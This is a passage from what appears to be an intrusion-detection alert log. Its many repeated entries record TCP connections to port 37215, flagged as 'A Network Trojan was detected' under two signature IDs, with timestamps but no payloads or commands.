                  Source Port:53988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198871
                  SID:2829579
                  Source Port:45908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.457476
                  SID:2835222
                  Source Port:42740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.173422
                  SID:2829579
                  Source Port:49598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.182553
                  SID:2835222
                  Source Port:46008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.454702
                  SID:2835222
                  Source Port:50830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.734254
                  SID:2835222
                  Source Port:52578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538222
                  SID:2835222
                  Source Port:37516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.895682
                  SID:2835222
                  Source Port:59740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.422787
                  SID:2829579
                  Source Port:50748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.939930
                  SID:2829579
                  Source Port:54960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811235
                  SID:2835222
                  Source Port:50922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.123925
                  SID:2829579
                  Source Port:56762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.041002
                  SID:2829579
                  Source Port:38892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860241
                  SID:2829579
                  Source Port:37560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888135
                  SID:2835222
                  Source Port:33006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.002516
                  SID:2829579
                  Source Port:35124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421608
                  SID:2835222
                  Source Port:49324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369832
                  SID:2829579
                  Source Port:60154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.525580
                  SID:2829579
                  Source Port:44894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.605859
                  SID:2835222
                  Source Port:33426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.815601
                  SID:2835222
                  Source Port:49330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.933162
                  SID:2835222
                  Source Port:42890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.393096
                  SID:2835222
                  Source Port:49054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.988498
                  SID:2829579
                  Source Port:58218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.997757
                  SID:2835222
                  Source Port:52188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834166
                  SID:2829579
                  Source Port:56694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654804
                  SID:2835222
                  Source Port:41328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.513537
                  SID:2829579
                  Source Port:58228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.910863
                  SID:2829579
                  Source Port:41164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.943122
                  SID:2835222
                  Source Port:33410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979399
                  SID:2829579
                  Source Port:52824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165580
                  SID:2835222
                  Source Port:56352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.008583
                  SID:2829579
                  Source Port:60018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983533
                  SID:2829579
                  Source Port:35270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.194125
                  SID:2835222
                  Source Port:35662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.067325
                  SID:2829579
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.891273
                  SID:2829579
                  Source Port:42482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.487311
                  SID:2829579
                  Source Port:38936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993407
                  SID:2829579
                  Source Port:43922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.250416
                  SID:2829579
                  Source Port:52346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.811251
                  SID:2829579
                  Source Port:60234
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.070020
                  SID:2829579
                  Source Port:60386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.585181
                  SID:2835222
                  Source Port:56966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.773841
                  SID:2835222
                  Source Port:56954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876445
                  SID:2829579
                  Source Port:53138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.913134
                  SID:2835222
                  Source Port:52360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.799639
                  SID:2835222
                  Source Port:35236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:46244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.991529
                  SID:2829579
                  Source Port:49694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.413827
                  SID:2835222
                  Source Port:44820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985108
                  SID:2829579
                  Source Port:38128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.335427
                  SID:2835222
                  Source Port:55610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.878785
                  SID:2835222
                  Source Port:45016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283618
                  SID:2835222
                  Source Port:35766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.540187
                  SID:2835222
                  Source Port:57194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.286417
                  SID:2829579
                  Source Port:56712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.851082
                  SID:2835222
                  Source Port:46948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.104603
                  SID:2829579
                  Source Port:56856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177973
                  SID:2829579
                  Source Port:37004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.367822
                  SID:2829579
                  Source Port:41264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.937320
                  SID:2835222
                  Source Port:37550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.781564
                  SID:2829579
                  Source Port:46496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.538711
                  SID:2829579
                  Source Port:37388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.867570
                  SID:2835222
                  Source Port:41930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510690
                  SID:2829579
                  Source Port:35070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.790586
                  SID:2829579
                  Source Port:54356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:45650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.766044
                  SID:2835222
                  Source Port:36310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2829579
                  Source Port:34326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.995409
                  SID:2829579
                  Source Port:60980
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.896326
                  SID:2835222
                  Source Port:45422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.539948
                  SID:2829579
                  Source Port:48146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.134234
                  SID:2835222
                  Source Port:59736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.417770
                  SID:2829579
                  Source Port:57974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.289116
                  SID:2829579
                  Source Port:49134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.855668
                  SID:2829579
                  Source Port:43242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.375708
                  SID:2829579
                  Source Port:60878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2829579
                  Source Port:42536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.080140
                  SID:2829579
                  Source Port:60730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.202550
                  SID:2835222
                  Source Port:51986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.886880
                  SID:2829579
                  Source Port:36428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.960420
                  SID:2829579
                  Source Port:50136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.136540
                  SID:2829579
                  Source Port:39018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2829579
                  Source Port:56278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.655824
                  SID:2835222
                  Source Port:33396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.934350
                  SID:2829579
                  Source Port:48812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.484487
                  SID:2829579
                  Source Port:44460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.412870
                  SID:2835222
                  Source Port:32842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.657885
                  SID:2835222
                  Source Port:56630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.915095
                  SID:2835222
                  Source Port:60072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.156135
                  SID:2835222
                  Source Port:53350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.970801
                  SID:2829579
                  Source Port:51584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.289116
                  SID:2829579
                  Source Port:47690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.483637
                  SID:2829579
                  Source Port:33684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792004
                  SID:2835222
                  Source Port:52194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.811363
                  SID:2835222
                  Source Port:56808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.854834
                  SID:2829579
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.556430
                  SID:2829579
                  Source Port:34702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.486596
                  SID:2829579
                  Source Port:45226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.525491
                  SID:2835222
                  Source Port:51680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.781471
                  SID:2835222
                  Source Port:47384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.837661
                  SID:2835222
                  Source Port:35740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.806534
                  SID:2829579
                  Source Port:55860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.498408
                  SID:2835222
                  Source Port:34558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.183370
                  SID:2835222
                  Source Port:56018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.156560
                  SID:2835222
                  Source Port:44436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2829579
                  Source Port:60674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.220907
                  SID:2829579
                  Source Port:53068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563571
                  SID:2835222
                  Source Port:37212
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.098663
                  SID:2835222
                  Source Port:60300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.477028
                  SID:2829579
                  Source Port:52576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.427653
                  SID:2829579
                  Source Port:37852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.064764
                  SID:2829579
                  Source Port:44636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.815817
                  SID:2835222
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.592748
                  SID:2829579
                  Source Port:59238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2835222
                  Source Port:38988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.862104
                  SID:2835222
                  Source Port:56912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.722420
                  SID:2835222
                  Source Port:60732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.104843
                  SID:2835222
                  Source Port:35648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867755
                  SID:2835222
                  Source Port:45018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2835222
                  Source Port:59852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.810322
                  SID:2829579
                  Source Port:38828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.517419
                  SID:2829579
                  Source Port:51550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802589
                  SID:2829579
                  Source Port:53682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.233567
                  SID:2835222
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156575
                  SID:2835222
                  Source Port:49744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.432344
                  SID:2829579
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.092342
                  SID:2835222
                  Source Port:38626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.285425
                  SID:2835222
                  Source Port:34070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.743341
                  SID:2829579
                  Source Port:60990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897517
                  SID:2835222
                  Source Port:55342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.879293
                  SID:2829579
                  Source Port:60810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.636567
                  SID:2829579
                  Source Port:54452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828351
                  SID:2835222
                  Source Port:38666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.926905
                  SID:2829579
                  Source Port:44496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.264352
                  SID:2829579
                  Source Port:34296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.534381
                  SID:2835222
                  Source Port:33416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095355
                  SID:2835222
                  Source Port:53780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.353960
                  SID:2835222
                  Source Port:55876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875738
                  SID:2835222
                  Source Port:53708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.858364
                  SID:2835222
                  Source Port:41484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.867068
                  SID:2829579
                  Source Port:60568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175364
                  SID:2829579
                  Source Port:55770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.720259
                  SID:2829579
                  Source Port:57320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.771626
                  SID:2829579
                  Source Port:51946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.524436
                  SID:2835222
                  Source Port:51950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.748733
                  SID:2829579
                  Source Port:43166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.255406
                  SID:2835222
                  Source Port:42076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667769
                  SID:2835222
                  Source Port:50038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.630697
                  SID:2829579
                  Source Port:33256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.366131
                  SID:2829579
                  Source Port:42680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848690
                  SID:2835222
                  Source Port:48510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.835894
                  SID:2835222
                  Source Port:35194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.447281
                  SID:2835222
                  Source Port:41084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.983145
                  SID:2835222
                  Source Port:37216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.791726
                  SID:2835222
                  Source Port:52914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659396
                  SID:2835222
                  Source Port:43794
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.539411
                  SID:2829579
                  Source Port:33044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.556731
                  SID:2835222
                  Source Port:50262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.615141
                  SID:2829579
                  Source Port:33516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.828822
                  SID:2829579
                  Source Port:57026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.955612
                  SID:2829579
                  Source Port:47342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872361
                  SID:2829579
                  Source Port:39302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152800
                  SID:2835222
                  Source Port:33720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.574545
                  SID:2835222
                  Source Port:38924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.376968
                  SID:2835222
                  Source Port:41238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.528715
                  SID:2829579
                  Source Port:32890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2829579
                  Source Port:46098
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168869
                  SID:2835222
                  Source Port:56786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.617783
                  SID:2829579
                  Source Port:33170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064237
                  SID:2829579
                  Source Port:39202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.951146
                  SID:2829579
                  Source Port:40864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.828083
                  SID:2829579
                  Source Port:53808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2829579
                  Source Port:39858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.160088
                  SID:2835222
                  Source Port:37554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.666585
                  SID:2835222
                  Source Port:50312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.842346
                  SID:2829579
                  Source Port:44014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641375
                  SID:2835222
                  Source Port:48882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.454904
                  SID:2835222
                  Source Port:34756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.529944
                  SID:2835222
                  Source Port:59800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.811319
                  SID:2829579
                  Source Port:56712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.746677
                  SID:2829579
                  Source Port:40950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.909366
